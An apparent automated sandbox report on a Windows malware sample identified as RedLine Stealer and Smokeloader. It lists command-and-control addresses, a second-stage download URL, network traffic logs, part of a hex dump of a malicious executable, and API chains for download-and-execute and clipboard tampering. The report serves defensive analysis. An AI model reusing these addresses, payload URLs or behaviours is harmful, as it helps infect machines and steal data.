                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://92.255.57.89/45c616e921a794b8.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 17:58:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 17:45:01 GMTETag: "4a600-628ee0a60051e"Accept-Ranges: bytesContent-Length: 304640Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fa 6d 43 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 24 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 fe 4e 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 18 03 00 3c 00 00 00 00 f0 40 00 10 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac ef 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c 20 00 00 00 00 03 00 00 22 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 30 03 00 00 6c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 22 01 00 00 f0 40 00 00 24 01 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
                  Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49725 -> 176.113.115.19:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49724 -> 172.67.179.207:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: ssB9bjDQPf.exe, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exex
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000985000.00000004.00000020.00020000.00000000.sdmp, 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000985000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/A
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/T
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89=8P
                  Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: ssB9bjDQPf.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE_
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEu
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49724 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024F1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_024F1942
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_004097A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,3_2_004097A0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024F2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_024F2361
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024F2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024F2605
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004280220_2_00428022
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004071AB0_2_004071AB
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004373D90_2_004373D9
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004274840_2_00427484
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004285600_2_00428560
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0043D6780_2_0043D678
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004166AF0_2_004166AF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004137250_2_00413725
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004277F60_2_004277F6
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0040E9740_2_0040E974
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0042EAE00_2_0042EAE0
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00427AA00_2_00427AA0
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00418AAF0_2_00418AAF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00436CBF0_2_00436CBF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00427D670_2_00427D67
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00413F0B0_2_00413F0B
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025182890_2_02518289
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0251ED470_2_0251ED47
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025041720_2_02504172
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025176EB0_2_025176EB
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0251D7550_2_0251D755
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025187C70_2_025187C7
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02517A5D0_2_02517A5D
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024FEBDB0_2_024FEBDB
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025069160_2_02506916
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0250398C0_2_0250398C
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02526F260_2_02526F26
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02517FCE0_2_02517FCE
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0251ED470_2_0251ED47
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02508D160_2_02508D16
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02517D070_2_02517D07
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A4B373_2_024A4B37
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: String function: 02500987 appears 53 times
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: String function: 00410720 appears 53 times
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: String function: 0040FDB2 appears 125 times
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: String function: 02500019 appears 121 times
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: String function: 00404980 appears 317 times
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304
                  Source: ssB9bjDQPf.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 8DF0.tmp.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: ssB9bjDQPf.exeBinary or memory string: OriginalFileName vs ssB9bjDQPf.exe
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs ssB9bjDQPf.exe
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs ssB9bjDQPf.exe
                  Source: ssB9bjDQPf.exe, 00000000.00000003.1476873599.0000000002560000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs ssB9bjDQPf.exe
                  Source: ssB9bjDQPf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: ssB9bjDQPf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 8DF0.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AF9FB6 CreateToolhelp32Snapshot,Module32First,0_2_00AF9FB6
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249CE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,3_2_0249CE47
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htmJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1280
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile created: C:\Users\user\AppData\Local\Temp\8DF0.tmpJump to behavior
                  Source: ssB9bjDQPf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ssB9bjDQPf.exeReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Users\user\Desktop\ssB9bjDQPf.exe "C:\Users\user\Desktop\ssB9bjDQPf.exe"
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeProcess created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeProcess created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: uxtheme.dllJump to behavior
